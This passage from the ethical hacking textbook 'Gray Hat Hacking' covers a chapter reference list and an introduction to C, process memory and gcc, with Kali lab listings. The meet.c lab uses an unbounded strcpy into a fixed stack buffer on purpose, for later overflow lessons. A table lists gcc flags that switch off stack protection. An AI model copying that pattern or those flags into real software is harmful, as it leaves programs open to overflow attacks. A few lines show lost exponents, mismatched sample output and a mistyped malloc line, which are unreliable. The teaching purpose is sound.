              CISA Coordinated Vulnerability Disclosure Process (CVD) www.cisa.gov/coordinated-
              vulnerability-disclosure-process
              Red Canary Atomic Red Team github.com/redcanaryco/atomic-red-team
              MITRE ATT&CK Navigator mitre-attack.github.io/attack-navigator/
              Threat Hunting with MITRE ATT&CK www.threathunting.se/2020/05/24/threat-
              detection-with-mitre-attck-and-atomic-redteam/

              References
                   1. “The Black Hat Briefings USA 1997 Speakers,” https://www.blackhat.com/html/
                      bh-usa-97/speakers.html (accessed Feb. 28, 2021).
                   2. “Grey hat,” Wikipedia, Mar. 24, 2021, https://en.wikipedia.org/w/index
                      .php?title=Grey_hat&oldid=1014051749 (accessed Apr. 10, 2021).
                   3. “[ENG] White Hat ? Black Hat ? Grey Hat ?” https://www.ddth.com/showthread
                      .php/200-ENG-White-Hat-Black-Hat-Grey-Hat (accessed Feb. 28, 2021).
                   4. “Grey hat,” Wikipedia, op. cit.
                   5. Synopsys, “Coverity Scan Open Source Report Shows Commercial Code Is
                      More Compliant to Security Standards than Open Source Code,” Synopsys,
                      Jul. 29, 2015, https://news.synopsys.com/2015-07-29-Coverity-Scan-Open-
                      Source-Report-Shows-Commercial-Code-Is-More-Compliant-to-Security-
                      Standards-than-Open-Source-Code (accessed Jun. 17, 2017).
                   6. C. Woody, R. Ellison, and W. Nichols, “Predicting Software Assurance Using
                      Quality and Reliability Measures,” Softw. Eng. Inst., p. 59.
                   7. K. Zetter, “Three Minutes with Rain Forest Puppy | PCWorld,” PCWorld,
                      Jan. 5, 2012.
                   8. “Full disclosure (mailing list),” Wikipedia, Sep. 06, 2016, https://en.wikipedia
                      .org/w/index.php?title=Full_disclosure_(mailing_list).
                   9. B. Schneier, “Essays: Schneier: Full Disclosure of Security Vulnerabilities a ‘Damned
                      Good Idea’ – Schneier on Security,” Jan. 2007, https://www.schneier.com/essays/
                      archives/2007/01/schneier_full_disclo.html (accessed Jun. 17, 2017).
                 10. M. J. Ranum, “The Vulnerability Disclosure Game: Are We More Secure?”
                     CSO Online, Mar. 01, 2008, www.csoonline.com/article/2122977/application-
                     security/the-vulnerability-disclosure-game—are-we-more-secure-.html (accessed
                     Jun. 17, 2017).
                 11. Imperva, Inc., “Imperva | Press Release | Analysis of Web Site Penetration Retests
                     Show 93% of Applications Remain Vulnerable After ‘Fixes,’” Jun. 2004, https://
                     www.imperva.com/company/press_releases/analysis-of-web-site-penetration-retests-
                     show-93-of-applications-remain-vulnerable-after-fixes/ (accessed Jun. 17, 2017).
12. A. Sacco, “Microsoft: Responsible Vulnerability Disclosure Protects Users,”
    CSO Online, Jan. 09, 2007, www.csoonline.com/article/2121631/build-ci-sdlc/

                                                                                                             PART I
    microsoft—responsible-vulnerability-disclosure-protects-users.html (accessed
    Jun. 18, 2017).
13. Schneier, op. cit.
14. G. Keizer, “Drop ‘responsible’ from bug disclosures, Microsoft urges,”
    Computerworld, Jul. 22, 2010, www.computerworld.com/article/2519499/
    security0/drop—responsible—from-bug-disclosures—microsoft-urges.html
    (accessed Jun. 18, 2017).
15. ibid.
16. “Project Zero (Google),” Wikipedia, May 2, 2017, https://en.wikipedia.org/w/
    index.php?title=Project_Zero_(Google).
17. “CERT Coordination Center,” Wikipedia, May 30, 2017, https://en.wikipedia
    .org/w/index.php?title=CERT_Coordination_Center.
18. CERT/CC, “Vulnerability Disclosure Policy | Vulnerability Analysis |
    The CERT Division,” https://vuls.cert.org/confluence/display/Wiki/
    Vulnerability+Disclosure+Policy (accessed Jun. 18, 2017).
19. D. Fisher, “No more free bugs for software vendors,” Threatpost | The first stop for
    security news, Mar. 23, 2009, https://threatpost.com/no-more-free-bugs-software-
    vendors-032309/72484/ (accessed Jun. 17, 2017).
20. P. Lindstrom, “No More Free Bugs | Spire Security Viewpoint,” Mar. 2009,
    http://spiresecurity.com/?p=65 (accessed Jun. 17, 2017).
21. A. O’Donnell, “‘No more free bugs’? There never were any free bugs,” ZDNet,
    Mar. 2009, www.zdnet.com/article/no-more-free-bugs-there-never-were-any-free-
    bugs/ (accessed Jun. 17, 2017).
22. “Bug bounty program,” Wikipedia, Jun. 14, 2017, https://en.wikipedia.org/wiki/
    Bug_bounty_program.
23. Mozilla Foundation, “Mozilla Foundation announces security bug bounty
    program,” Mozilla Press Center, Aug. 2004, https://blog.mozilla.org/
    press/2004/08/mozilla-foundation-announces-security-bug-bounty-program/
    (accessed Jun. 24, 2017).
24. “Pwn2Own,” Wikipedia, Jun. 14, 2017, https://en.wikipedia.org/w/index
    .php?title=Pwn2Own.
25. E. Friis-Jensen, “The History of Bug Bounty Programs,” Cobalt.io, Apr. 11,
    2014, https://blog.cobalt.io/the-history-of-bug-bounty-programs-50def4dcaab3
    (accessed Jun. 17, 2017).
26. T. Ring, “Why bug hunters are coming in from the wild,” Computer Fraud &
    Security, vol. 2014, no. 2, pp. 16–20, Feb. 2014.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 27. E. Mills, “Facebook hands out White Hat debit cards to hackers,” CNET, Dec.
                     2011, https://www.cnet.com/news/facebook-hands-out-white-hat-debit-cards-to-
                     hackers/ (accessed Jun. 24, 2017).
                 28. ibid.
                 29. S. Tzu, The art of war, Orange Publishing, 2013.
                 30. M. Santarcangelo, “Why you need to embrace the evolution of APT,” CSO Online,
                     May 27, 2014, https://www.csoonline.com/article/2158775/why-you-need-to-
                     embrace-the-evolution-of-apt.html (accessed Apr. 10, 2021).
                 31. E. M. Hutchins, M. J. Cloppert, and R. M. Amin, “Intelligence-Driven Computer
                     Network Defense Informed by Analysis of Adversary Campaigns and Intrusion
                     Kill Chains,” p. 14, 2011.
                 32. Sp4rkCon by Walmart, Putting MITRE ATT&CKTM into Action with What You
                     Have, Where You Are (presented by Katie Nickels), 2019.
                 33. “MITRE ATT&CK®,” https://attack.mitre.org/ (accessed Mar. 28, 2021).
   Programming
   Survival Skills
                                                                                CHAPTER

                                                                                                  2
   In this chapter, we cover the following topics:
       • C programming language
       • Computer memory
       • Intel processors
       • Assembly language basics
       • Debugging with gdb
       • Python survival skills

Why study programming? Ethical hackers should study programming and learn as much
about the subject as possible in order to find vulnerabilities in programs and get them
fixed before unethical hackers and black hats take advantage of them. Many security
professionals come at programming from a nontraditional perspective, often having no
programming experience prior to beginning their career. Bug hunting is very much a foot
race: if a vulnerability exists, who will find it first? The purpose of this chapter is to give
you the survival skills necessary to understand upcoming chapters and then later to find
the holes in software before the black hats do.

C Programming Language
The C programming language was developed in 1972 by Dennis Ritchie from AT&T
Bell Labs. The language was heavily used in Unix and is therefore ubiquitous. In fact,
many of the staple networking programs and operating systems, as well as large applica-
tions such as Microsoft Office Suite, Adobe Reader, and browsers, are written in combi-
nations of C, C++, Objective-C, assembly, and a couple of other lower-level languages.

Basic C Language Constructs
Although each C program is unique, some common structures can be found in most
programs. We’ll discuss these in the next few sections.

Gray Hat Hacking: The Ethical Hacker’s Handbook
              main()
              All C programs “should” (see the “For Further Reading” section for an exception) con-
              tain a main() function (lowercase) that follows the format
              <optional return value type> main(<optional argument>) {
                <optional procedure statements or function calls>;
              }

              where both the return value type and arguments are optional. If no return value type is
              specified, a return type of int is used; however, some compilers may throw warnings if
              you fail to specify its return value as int or attempt to use void. If you use command-line
              arguments for main(), you could use the format
              <optional return value type> main(int argc, char * argv[]){

              (among others), where the argc integer holds the number of arguments and the argv array
              holds the input arguments (strings). The name of the program is always stored at offset
              argv[0]. The parentheses and brackets are mandatory. The brackets are used to denote the
              beginning and end of a block of code. Although procedure and function calls are optional,
              the program would do nothing without them. A procedure statement is simply a series of
              commands that performs operations on data or variables and normally ends with a semicolon.

              Functions
              Functions are self-contained bundles of code that can be called for execution by main() or
              other functions. They are nonpersistent and can be called as many times as needed, thus
              preventing us from having to repeat the same code throughout a program. The format
              is as follows:
              <optional return value type> function name (<optional function argument>){
              }

                 The function name and optional argument list comprise the signature. By looking
              at it, you can tell if the function requires arguments that will be used in processing the
              procedures of the function. Also notice the optional return value; this tells you if the
              function returns a value after executing and, if so, what type of data that is.
                 The call to the function may look like this:
              <optional variable to store the returned value> = function name (arguments
              if called for by the function signature);

                  The following is a simple example:
              #include <stdio.h>
              #include <stdlib.h>
              int foo(){➍
                 return 8;➐
              }
              int main(void){➌
                 int val_x;➎
                 val_x = foo();➏
                 printf("The value returned is: %d\n", val_x);➋➑
                 exit(0);➊
              }
                                                                                Chapter 2: Programming Survival Skills
   Here, we are including the appropriate header files, which include the function dec-
larations for exit and printf. The exit ➊ function is defined in stdlib.h, and printf ➋

                                                                                                                         PART I
is defined in stdio.h. If you do not know what header files are required based on the
dynamically linked functions you are using in a program, you can simply look at the
manual entry, such as man sscanf, and refer to the synopsis at the top. We then define
the main ➌ function with a return value of int. We specify void ➍ in the arguments
location between the parentheses because we do not want to allow arguments passed to
the main function. We then create a variable called x with a data type of int ➎. Next, we
call the function foo ➏ and assign the return value to x. The foo function simply returns
the value 8 ➐. This value is then printed onto the screen using the printf function, using
the format string %d to treat x as a decimal value ➑.
   Function calls modify the flow of a program. When a call to a function is made,
the execution of the program temporarily jumps to the function. After execution of
the called function has completed, control returns to the calling function at the virtual
memory address directly below the call instruction. This process will make more sense
during our discussion of stack operations in Chapter 10.

Variables
Variables are used in programs to store pieces of information that may change and may
be used to dynamically influence the program. Table 2-1 shows some common types
of variables.
    When the program is compiled, most variables are pre-allocated memory of a fixed
size according to system-specific definitions of size. Sizes in Table 2-1 are considered
typical; there is no guarantee you will get those exact sizes. It is left up to the hardware
implementation to define the size. However, the function sizeof() is used in C to ensure
that the correct sizes are allocated by the compiler.
    Variables are typically defined near the top of a block of code. As the compiler chews
up the code and builds a symbol table, it must be aware of a variable before that variable
is used in the code later. The word “symbol” is simply a name or identifier. This formal
declaration of variables is done in the following manner:
<variable type> <variable name> <optional initialization starting with "=">;

 Variable Type     Use                                     Typical Size
 int               Stores a signed integer value such      8 bytes for 64-bit machines
                   as 314 or –314                          4 bytes for 32-bit machines
                                                           2 bytes for 16-bit machines
 float             Stores a signed floating-point          4 bytes
                   number such as –3.234
 double            Stores a large floating-point           8 bytes
                   number
 char              Stores a single character such as “d”   1 byte
Table 2-1 Types of Variables
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  For example, in the line
              int a = 0;

              an integer (normally 4 bytes) is declared in memory with a symbol of a and an initial
              value of 0.
                 Once a variable is declared, the assignment construct is used to change the value of the
              variable. For example, the statement
              x=x+1;

              is an assignment statement that changes the value of the variable x. The new value of x is
              the current value of x modified by the + operator. It is common to use the format
              destination = source <with optional operators>

              where destination is the location in which the final outcome is stored.

              printf
              The C language comes with many useful constructs bundled into the libc library. One
              of many commonly used constructs is the printf command, generally used to print out-
              put to the screen. There are two forms of the printf command:
              printf(<string>);
              printf(<format string>, <list of variables/values>);

                  The first format is straightforward and is used to display a simple string to the screen.
              The second format allows for more flexibility through the use of a format type that can
              be composed of normal characters and special symbols that act as placeholders for the
              list of variables following the comma. Commonly used format symbols are listed and
              described in Table 2-2.
                  These format types allow the programmer to indicate how they want data displayed to
              the screen, written to a file, or other possibilities through the use of the printf family of
              functions. As an example, say you know a variable to be a float and you want to ensure
              that it is printed out as such, and you also want to limit its width, both before and after
              the floating point. In this case, you could use the code in the following lab in Kali, where
              we first change our shell to bash and then get the code from GitHub using git clone.

Table 2-2                       Format Type   Meaning         Example
              printf Format                   %n            Print nothing   printf("test %n");
              Types
                                              %d            Decimal value   printf("test %d", 123);
                                              %s            String value    printf("test %s", "123");
                                              %x            Hex value       printf("test %x", 0x123);
                                              %f            Float           printf("test %f", 1.308);
                                                                            Chapter 2: Programming Survival Skills

Lab 2-1: Format Strings

                                                                                                                     PART I
In this lab, we download the code for all the labs in this chapter and then focus on format
strings, which will allow us to format the output of our program as we wish.
┌──(kali kali)-[~]
└─$ bash
┌──(kali kali)-[~]
└─$ git clone https://github.com/GrayHatHacking/GHHv6.git
Cloning into 'GHHv6'...
remote: Enumerating objects: 509, done.
remote: Total 509 (delta 0), reused 0 (delta 0), pack-reused 509
Receiving objects: 100% (509/509), 98.11 MiB | 21.29 MiB/s, done.
Resolving deltas: 100% (158/158), done.
Updating files: 100% (105/105), done.
┌──(kali kali)-[~]
└─$ ls
Desktop    Downloads GHHv6 Pictures Templates
Documents gh6         Music Public     Videos
┌──(kali kali)-[~]
└─$ cd GHHv6/ch02
┌──(kali kali)-[~/GHHv6/ch02]

    Now, we can look at our code:
└─$ cat fmt_str.c
#include <stdio.h>

int main(void){
  double x = 23.5644;
  printf("The value of x is %5.2f\n", x);➊
  printf("The value of x is %4.1f\n", x);➋

    return 0;
}

In the first printf call ➊, we use a total width of 5, with 2 values after the floating
point. In the second call to printf ➋, we use a total width of 4, with 1 value after the
floating point.
   Now, let’s compile it with gcc and run it:
┌──(kali kali)-[ ~/GHHv6/ch02]
└─$ gcc fmt_str.c -o fmt_str
┌──(kali kali)-[ ~/GHHv6/ch02]
└─$ ./fmt_str
The value of x is 23.56
The value of x is 23.6

                NOTE The examples in this chapter use 2020.4 64-bit Kali Linux. If you are
                using 32-bit Kali Linux, you may need to change your compiler options.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              scanf
              The scanf command complements the printf command and is generally used to get
              input from the user. The format is
              scanf(<format string>, <list of variables/values>);

              where the format string can contain format symbols such as those shown for printf in
Table 2-2. For example, the following code will read an integer from the user and store
              it in a variable called number:
              scanf("%d", &number);

                 Actually, the & symbol means we are storing the value in the memory location
              pointed to by number. This will make more sense when we talk about pointers later in
              the chapter in the “Pointers” section. For now, realize that you must use the & symbol
              before any variable name with scanf. The command is smart enough to change types on
              the fly, so if you were to enter a character in the previous command prompt, the com-
              mand would convert the character into the decimal (ASCII) value automatically. Bounds
              checking is not done in regard to string size, however, which may lead to problems, as
              discussed later in Chapter 10.

              strcpy/strncpy
              The strcpy command is one of the most dangerous functions used in C. The format of
              the command is as follows:
              strcpy(<destination>, <source>);

                  The purpose of the command is to copy each character in the source string (a series of
              characters ending with a null character, \0) into the destination string. This is particularly
              dangerous because there is no checking of the source’s size before it is copied over to the
              destination. In reality, we are talking about overwriting memory locations here, which is
              something that will be explained later in this chapter. Suffice it to say, when the source
              is larger than the space allocated for the destination, overflow conditions are likely pres-
              ent, which could result in the control of program execution. When used properly, a safer
              alternative function is the strncpy command. Here is the format of that command:
              strncpy(<destination>, <source>, <width>);

                 The <width> field is used to ensure that only a certain number of characters are cop-
              ied from the source string to the destination string, allowing for greater control by the
              programmer. The width parameter should be based on the size of the destination, such
              as an allocated buffer. Another alternative function with the ability to control the size
              and handle errors is snprintf. Overall, the C programming language’s handling of strings
              has always been debated and highly scrutinized due to the requirement of the developer
              to handle memory allocation.
                                                                           Chapter 2: Programming Survival Skills
             CAUTION Using unbounded functions like strcpy is unsafe; however, many

                                                                                                                    PART I
             traditional programming courses do not cover the dangers posed by these
             functions in enough detail. In fact, if programmers would simply properly
             use the safer alternatives, such as snprintf, then the entire class of buffer
             overflow attacks would be less prevalent. Many programmers clearly
             continue to use these dangerous functions because buffer overflows are
             still commonly discovered. Legacy code containing bad functions is another
             common problem. Luckily, most compilers and operating systems support
             various exploit-mitigation protections that help to prevent exploitation of
             these types of vulnerabilities. That said, even bounded functions can suffer
             from incorrect buffer size calculations.

Lab 2-2: Loops

Loops are used in programming languages to iterate through a series of commands
multiple times. The two common types are for and while loops.
   for loops start counting at a beginning value, test the value for some condition, execute
the statement, and increment the value for the next iteration. The format is as follows:
for(<beginning value>; <test value>; <change value>){
   <statement>;
}

   Therefore, a for loop like
for(i=0; i<10; i++){
   printf("%d", i);
}

will print the numbers 0 to 9 on the same line (since \n is not used), like this: 0123456789.
   With for loops, the condition is checked prior to the iteration of the statements in the
loop, so it is possible that even the first iteration will not be executed. When the condi-
tion is not met, the flow of the program continues after the loop.

             NOTE It is important to note the use of the less-than operator (<) in place
             of the less-than-or-equal-to operator (<=), which allows the loop to proceed
             one more time until i=10. This is an important concept that can lead to off-
             by-one errors. Also, note that the count started with 0. This is common in C
             and worth getting used to.

The while loop is used to iterate through a series of statements until a condition is met.
A basic example follows:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat while_ex.c
#include <stdio.h>

int main(void){
  int x = 0;
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  while (x<10) {
                    printf("x = %d\n", x);
                    x++;
                  }
                  return 0;
              }
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ gcc while_ex.c -o while_ex
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ ./while_ex
              x = 0
              x = 1
              x = 2
              x = 3
              x = 4
              x = 5
              x = 6
              x = 7
              x = 8
              x = 9

                  Loops may also be nested within each other.

              Lab 2-3: if/else

              The if/else construct is used to execute a series of statements if a certain condition is met;
              otherwise, the optional else block of statements is executed. If there is no else block of
              statements, the flow of the program will continue after the end of the closing if block
              bracket (}). The following is an example of an if/else construct nested within a for loop:
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ cat ifelse.c
              #include <stdio.h>

              int main(void){
                int x = 0;
                while(1){➊
                  if (x == 0) {➋
                    printf("x = %d\n", x);
                    x++;
                    continue;
                  }
                  else {➌
                    printf("x != 0\n");
                    break;➍
                  }
                  return 0;
                }
              }

              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ gcc ifelse.c -o ifelse
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ ./ifelse
              x = 0
              x ≠ 0
                                                                          Chapter 2: Programming Survival Skills
   In this example, we use a while ➊ loop to loop through the if/else statements. Before
we go into the loop, we set the variable x to 0. Because x is equal to 0, we meet the condi-

                                                                                                                   PART I
tion in the if statement ➋. Then we call the printf function, increment x by 1, and then
continue. Since x is now 1, we don’t meet the condition for the if statement during the
second iteration through the loop. Therefore, we move on to the else statement ➌, which
calls the printf function and then breaks ➍ out of the loop. The braces may be omitted
for single statements.

Comments
To assist in the readability and sharing of source code, programmers include comments
in the code. You can use one of two ways to place comments in code: // or /* and */. The
// comment type indicates that any characters on the rest of that line are to be treated as
comments and not acted on by the computer when the program executes. The /* and */
pair starts and stops a block of comments that may span multiple lines. In this case, /*
is used to start the comment, and */ is used to indicate the end of the comment block.

Sample Programs
You are now ready to review your first program.

Lab 2-4: hello.c

We will start by showing the program with // comments included and will follow up with
a discussion of the program.
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat hello.c
// hello.c                  // customary comment of program name
#include <stdio.h>          // needed for screen printing
int main(){                 // required main function
  printf("Hello haxor!\n"); // simply say hello
}                           // exit program

This very simple program prints “Hello haxor!” to the screen using the printf function,
included in the stdio.h library. Try to compile it, now that you know how, and run it!

Lab 2-5: meet.c

Now for something that’s a little more complex. This program will take input, store it,
then print it:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat meet.c
// meet.c
#include <stdio.h>        // needed for screen printing
#include <string.h>       // needed for strcpy
Gray Hat Hacking: The Ethical Hacker’s Handbook
              void greeting(char *temp1,char *temp2){ ➋ // greeting function to say hello
                 char name[400];         // string variable to hold the name
                 strcpy(name, temp2);    // copy argument to name with the infamous strcpy
                 printf("Hello %s %s\n", temp1, name); ➌ // print out the greeting
              }
              int main(int argc, char * argv[]){ ➊   // note the format for arguments
                 greeting(argv[1], argv[2]); ➋ // call function, pass title & name
                 printf("Bye %s %s\n", argv[1], argv[2]); ➍ // say "bye"
              }➎                                // exit program

              This program takes two command-line arguments ➊ and calls the greeting() ➋ func-
              tion, which prints “Hello” and the name given, followed by a carriage return ➌. When
              the greeting() function finishes, control is returned to main(), which prints out “Bye”
              and the name given ➍. Finally, the program exits ➎.

              Compiling with gcc
              Compiling is the process of turning human-readable source code into machine-readable
              binary files that can be digested by the computer and executed. More specifically, a
              compiler takes source code and translates it into an intermediate set of files called object
              code. These files are nearly ready to execute but may contain unresolved references to
              symbols and functions not included in the original source code file. These symbols
              and references are resolved through a process called linking, as each object file is linked
              together into an executable binary file. We have simplified the process for you here, but
              these are the main steps.
                 When programming with C on Unix systems, most programmers prefer to use the
              GNU C Compiler (gcc). gcc offers plenty of options when compiling. The most com-
              monly used flags are listed and described in Table 2-3.

                Option                            Description
                –o <filename>                     Saves the compiled binary with this name. The default is to
                                                  save the output as a.out.
                –S                                Produces a file containing assembly instructions; saved with
                                                  an .s extension.
                –ggdb                             Produces extra debugging information; useful when using
                                                  the GNU debugger (gdb).
                –c                                Compiles without linking; produces object files with
                                                  an .o extension.
                –mpreferred-stack-boundary=2      Compiles the program using a DWORD size stack, simplifying
                                                  the debugging process while you learn.
                –fno-stack-protector              Disables the stack protection; introduced with GCC 4.1. This
                                                  option is useful when you’re learning about buffer overflows,
                                                  as you will in Chapter 11.
                –z execstack                      Enables an executable stack. This option is useful when you’re
                                                  learning about buffer overflows, as you will in Chapter 11.
Table 2-3 Commonly Used gcc Flags
                                                                          Chapter 2: Programming Survival Skills

Lab 2-6: Compiling meet.c

                                                                                                                   PART I
To compile our meet.c program, you would type the following in Kali 2020.4 64-bit:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ gcc -o meet meet.c

  Then, to execute the new program, you type
┌──(kali kali)-[~/GHHv6/ch02]
└─$ ./meet Leet Haxor
Hello 1337 Haxor
Bye 1337 Haxor
$

   You will use various compiler options to compile programs in this book and beyond;
see the “For Further Reading” section for more information on using gcc.

Computer Memory
In the simplest terms, computer memory is an electronic mechanism that has the ability
to store and retrieve data. The smallest amount of data that can be stored is 1 bit, which
can be represented by either a 1 or a 0 in memory. When you put 4 bits together, it is
called a nibble, which can represent values from 0000 to –1111. There are exactly
16 binary values, ranging from 0 to 15, in decimal format. When you put two nibbles,
or 8 bits, together, you get a byte, which can represent values from 0 to (28 – 1), or 0 to
255 in decimal. When you put 2 bytes together, you get a word, which can represent
values from 0 to (216 – 1), or 0 to 65,535 in decimal. Continuing to piece data together,
if you put two words together, you get a double word, or DWORD, which can represent
values from 0 to (232 – 1), or 0 to 4,294,967,295 in decimal. Two DWORDs together
is a quadruple word, or QWORD, which can represent values from 0 to (264 – 1), or 0
to 18,446,744,073,709,551,615 in decimal. In terms of memory addressing on 64-bit
AMD and Intel processors, only the lower 48 bits are used, which offers 256 terabytes of
addressable memory. This is well documented in countless online resources.
    There are many types of computer memory; we will focus on random access memory
(RAM) and registers. Registers are special forms of memory embedded within processors,
which will be discussed later in this chapter in the “Registers” section.

Random Access Memory
In RAM, any piece of stored data can be retrieved at any time—thus, the term random
access. However, RAM is volatile, meaning that when the computer is turned off, all
data is lost from RAM. When we’re discussing modern Intel- and AMD-based prod-
ucts (x86 and x64), the memory is 32-bit or 48-bit addressable, respectively, meaning
that the address bus the processor uses to select a particular memory address is 32 or
48 bits wide. Therefore, the most memory that can be addressed in an x86 processor is
4,294,967,295 bytes or 281,474,976,710,655 bytes (256 terabytes). On an x64 64-bit
Gray Hat Hacking: The Ethical Hacker’s Handbook
              processor, addressing can be expanded in the future by adding more transistors, but 248
              is plenty for current systems.

              Endian
              In Internet Experiment Note (IEN) 137, “On Holy Wars and a Plea for Peace,” from
              1980, Danny Cohen summarized Swift’s Gulliver’s Travels, in part, as follows in his dis-
              cussion of byte order:
                        Gulliver finds out that there is a law, proclaimed by the grandfather of the present
                        ruler, requiring all citizens of Lilliput to break their eggs only at the little ends.
                        Of course, all those citizens who broke their eggs at the big ends were angered
                        by the proclamation. Civil war broke out between the Little-Endians and the
                        Big-Endians, resulting in the Big-Endians taking refuge on a nearby island, the
                        kingdom of Blefuscu.1
                 The point of Cohen’s paper was to describe the two schools of thought when writ-
              ing data into memory. Some feel that the low-order bytes should be written first (called
              “Little-Endians” by Cohen), whereas others think the high-order bytes should be writ-
              ten first (called “Big-Endians”). The difference really depends on the hardware you
              are using. For example, Intel-based processors use the little-endian method, whereas
              Motorola-based processors use big-endian.

              Segmentation of Memory
              The subject of segmentation could easily consume a chapter itself. However, the basic con-
              cept is simple. Each process (oversimplified as an executing program) needs to have access
              to its own areas in memory. After all, you would not want one process overwriting another
              process’s data. Therefore, memory is broken down into small segments and handed out
              to processes as needed. Registers, discussed later in the chapter, are used to store and keep
              track of the current segments a process maintains. Offset registers are used to keep track
              of where in the segment the critical pieces of data are kept. Segmentation also describes
              the memory layout within a process’s virtual address space. Segments such as the code seg-
              ment, data segment, and stack segment are intentionally allocated in different regions of
              the virtual address space within a process to prevent collisions and to allow for the ability
              to set permissions accordingly. Each running process gets its own virtual address space, and
              the amount of space depends on the architecture (such as 32-bit or 64-bit), system settings,
              and the OS. A basic 32-bit Windows process by default gets 4GB, where 2GB is assigned
              to the user-mode side of the process and 2GB is assigned to the kernel-mode side of the
              process. Only a small portion of this virtual space within each process is mapped to physical
              memory, and depending on the architecture, there are various ways of performing virtual-
              to-physical memory mapping through the use of paging and address translation.

              Programs in Memory
              When processes are loaded into memory, they are basically broken into many small
              sections. We are only concerned with six main sections, which we discuss in the
              following subsections.
                                                                              Chapter 2: Programming Survival Skills
.text Section
The .text section, also known as the code segment, basically corresponds to the .text por-

                                                                                                                       PART I
tion of the binary executable file. It contains the machine instructions to get the task
done. This section is marked as readable and executable and will cause an access violation
if a write attempt is made. The size is fixed at runtime when the process is first loaded.

.data Section
The .data section is used to store global initialized variables, such as
int a = 0;

The size of this section is fixed at runtime. It should only be marked as readable.

.bss Section
The below stack section (.bss) is used to store certain types of global uninitialized variables,
such as
int a;

The size of this section is fixed at runtime. This segment needs to be readable and writ-
able but should not be executable.

Heap Section
The heap section is used to store dynamically allocated variables and grows from the
lower-addressed memory to the higher-addressed memory. The allocation of memory is
controlled through the malloc(), realloc(), and free() functions. For example, to declare
an integer and have the memory allocated at runtime, you would use something like this:
int i = malloc (sizeof (int)); // dynamically allocates an integer, contains
                               // the preexisting value of that memory

The heap section should be readable and writable but should not be executable because
an attacker who gains control of a process could easily perform shellcode execution in
regions such as the stack and heap.

Stack Section
The stack section is used to keep track of function calls (recursively) and grows from
the higher-addressed memory to the lower-addressed memory on most systems. If the
process is multithreaded, each thread will have a unique stack. As you will see, the fact
that the stack grows from high memory toward low memory allows the subject of buffer
overflows to exist. Local variables exist in the stack section. The stack segment is further
explained in Chapter 10.

Environment/Arguments Section
The environment/arguments section is used to store a copy of system-level variables that
may be required by the process during runtime. For example, among other things, the
path, shell name, and hostname are made available to the running process. This section
Gray Hat Hacking: The Ethical Hacker’s Handbook
              is writable, allowing its use in format string and buffer overflow exploits. Additionally,
              the command-line arguments are stored in this area. The sections of memory reside in
              the order presented. The memory space of a process looks like this:

              Buffers
              The term buffer refers to a storage place used to receive and hold data until it can be
              handled by a process. Since each process can have its own set of buffers, it is critical to
              keep them straight; this is done by allocating the memory within the .data or .bss section
              of the process’s memory. Remember, once allocated, the buffer is of fixed length. The
              buffer may hold any predefined type of data; however, for our purpose, we will focus on
              string-based buffers, which are used to store user input and text-based variables.

              Strings in Memory
              Simply put, strings are just continuous arrays of character data in memory. The string is
              referenced in memory by the address of the first character. The string is terminated or
              ended by a null character (\0 in C). The \0 is an example of an escape sequence. Escape
              sequences enable the developer to specify a special operation, such as a newline with
              \n or a carriage return with \r. The backslash ensures that the subsequent character is
              not treated as part of the string. If a backslash is needed, one can simply use the escape
              sequence \\, which will show only a single \. Tables of the various escape sequences can
              be found online.

              Pointers
              Pointers are special pieces of memory that hold the address of other pieces of memory.
              Moving data around inside of memory is a relatively slow operation. It turns out that
              instead of moving data, keeping track of the location of items in memory through point-
              ers and simply changing the pointers is much easier. Pointers are saved in 4 or 8 bytes
              of contiguous memory, depending on whether the application is 32-bit or 64-bit. For
              example, as mentioned, strings are referenced by the address of the first character in the
              array. That address value is called a pointer. The variable declaration of a string in C is
              written as follows:
              char * str; // This is read. Give me 4 or 8 bytes called str which is a
                          // pointer to a Character variable (the first byte of the
                          // array).

              Note that even though the size of the pointer is set at 4 or 8 bytes, depending on the
              architecture, the size of the string has not been set with the preceding command; there-
              fore, this data is considered uninitialized and will be placed in the .bss section of the
              process memory.
                                                                          Chapter 2: Programming Survival Skills
  Here is another example; if you wanted to store a pointer to an integer in memory, you
would issue the following command in your C program:

                                                                                                                   PART I
int * point1; //this is read, give me 4 or 8 bytes called point1, which is a
              //pointer to an integer variable.

   To read the value of the memory address pointed to by the pointer, you dereference
the pointer with the * symbol. Therefore, if you want to print the value of the integer
pointed to by point1 in the preceding code, you would use the command
printf("%d", *point1);

where * is used to dereference the pointer called point1 and display the value of the
integer using the printf() function.

Putting the Pieces of Memory Together
Now that you have the basics down, we will look at a simple example that illustrates the
use of memory in a program.

Lab 2-7: memory.c

First we will list the contents of the program by using cat:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat ./memory.c
#include <stdlib.h>
#include <string.h>
  int _index = 5;     // integer stored in data (initialized)
  char * str;         // string stored in bss (uninitialized)
  int nothing;        // integer stored in bss (uninitialized)
void funct1(int c){➌ // bracket starts function1 block with argument (c)
  int i=c;➌                                   // stored in the stack region
  str = (char*) malloc (10 * sizeof (char));➍ // Reserves 10 characters in
                                              // the heap region */
  strncpy(str, "abcde", 5);➎ // copies 5 characters "abcde" into str
}                             // end of function1
void main (){➊                // the required main function
  funct1(1);➋                 // main calls function1 with an argument
}➏                            // end of the main function

   This program does not do much. First, several pieces of memory are allocated in dif-
ferent sections of the process memory. When main is executed ➊, funct1() is called with
an argument of 1 ➋. Once funct1() is called, the argument is passed to the function
variable called c ➌. Next, memory is allocated on the heap for a 10-byte string called
str ➍. Finally, the 5-byte string “abcde” is copied into the new variable called str ➎. The
function ends, and then the main() program ends ➏.

             CAUTION You must have a good grasp of this material before moving on in
             the book. If you need to review any part of this chapter, please do so before
             continuing.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Intel Processors
              There are several commonly used computer architectures. In this chapter, we focus on
              the Intel family of processors or architecture. The term architecture simply refers to the
              way a particular manufacturer implemented its processor. The x86 (32-bit) and x86-64
